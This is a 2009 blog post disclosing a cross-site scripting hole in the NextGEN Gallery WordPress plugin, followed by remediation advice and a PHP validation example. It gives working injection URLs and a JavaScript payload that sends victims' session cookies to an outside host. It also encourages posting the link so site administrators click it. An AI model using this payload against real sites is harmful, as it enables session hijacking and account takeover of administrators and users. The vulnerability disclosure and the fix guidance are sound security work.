Friday, July 17, 2009

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

Intro

I will not explain what XSS actually is; for that, refer to here. To see what I mean, check out the links given below. If you are using the NextGEN WordPress plugin, you are probably vulnerable.

The Vulnerability

The vulnerability in this WordPress plugin is in the pid, album and gallery GET variables.

http://www.example.com/wordpress/next-gen-gallery/?album=1&pid=3&gallery=2


On most sites the GET variables are printed directly into the <title> HTML tag of the page. So if you try something like

next-gen-gallery/?album=1&pid=3&gallery=2(XSS HOLE CAN BE HERE)

the title becomes

<title>Picture 3 &laquo; Album 1 &laquo; Gallery 2(XSS HOLE CAN BE HERE) &laquo; Next Gen Gallery &laquo; xxxxxxxxxxx WordPress Demo</title>


So we can insert our own custom HTML into the GET query, from harmless HTML tags to dangerous SCRIPT tags, which allows for Cross Site Scripting. Since WordPress is written in PHP, and magic_quotes_gpc is turned on by default on older PHP installations, the quotes would be escaped. So simple tests for XSS like

next-gen-gallery/?album=1&pid=3&gallery=2<title/><script>alert("hi");</script>

would fail, since the quotes around "hi" would appear as \"hi\". However, why worry about the quotes when something like this works:

next-gen-gallery/?album=1&pid=3&gallery=2<title/><script src=http://labs.kitiyo.com/store.php></script>


Whatever code is in the target file gets executed on the website. The following code can be put there for stealing the cookie:
(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location='+window.location;
window.location = "URL back to the page";


Then post this link where site administrators or other registered users will click it and hand us over their session cookies ;)

I am vulnerable, now what do I do? (for webmasters)
The XSS is due to blindly printing the $_GET variable into the title. The makers of this plugin should note this and do the required validation on the GET parameters. Since the parameters are numeric, it should not be hard to apply an is_numeric check to them.
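
One way to apply the check described above, as an added example (this is not the plugin's code; the function names gallery_int_param and gallery_title are hypothetical). It uses ctype_digit, which is stricter than is_numeric (that also accepts forms such as 1.5 or 1e3), and escapes the remaining text on output:

```php
<?php
// Added example, not NextGEN Gallery's code. Function names are hypothetical.

/**
 * Return the parameter as an integer, or null if it is absent
 * or anything other than plain decimal digits.
 */
function gallery_int_param(array $query, string $name): ?int
{
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null;               // missing, or an array such as ?pid[]=1
    }
    $raw = $query[$name];
    // ctype_digit() is true only for non-empty strings of 0-9, so
    // "2<title/>", "1e3", "-1" and " 2" are all rejected.
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;               // length cap keeps the cast within int range
    }
    return (int) $raw;
}

/** Build the <title> from validated ids only; escape every other string. */
function gallery_title(array $query, string $blogName): string
{
    $labels = ['pid' => 'Picture', 'album' => 'Album', 'gallery' => 'Gallery'];
    $parts = [];
    foreach ($labels as $param => $label) {
        $id = gallery_int_param($query, $param);
        if ($id !== null) {
            $parts[] = $label . ' ' . $id;   // fixed label plus integer: no markup possible
        }
    }
    $parts[] = 'Next Gen Gallery';
    // Escape on output too, so a string field cannot break out of the tag.
    $parts[] = htmlspecialchars($blogName, ENT_QUOTES, 'UTF-8');
    return '<title>' . implode(' &laquo; ', $parts) . '</title>';
}

// Constructed sample input mirroring the query strings shown above.
$clean   = ['album' => '1', 'pid' => '3', 'gallery' => '2'];
$tainted = ['album' => '1', 'pid' => '3',
            'gallery' => '2<title/><script>alert("hi");</script>'];

echo gallery_title($clean, 'WordPress Demo'), "\n";
echo gallery_title($tainted, 'WordPress Demo'), "\n";
```

With the tainted query the gallery part is dropped from the title instead of being echoed back.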

Don't believe it? Check out these links (XSS demo)


Happy hacking ...
Fix the bugs
Cheers....

1 comments:

Arun Prabhakar said...

This issue is fixed by the coder.
Please upgrade your nextGen gallery.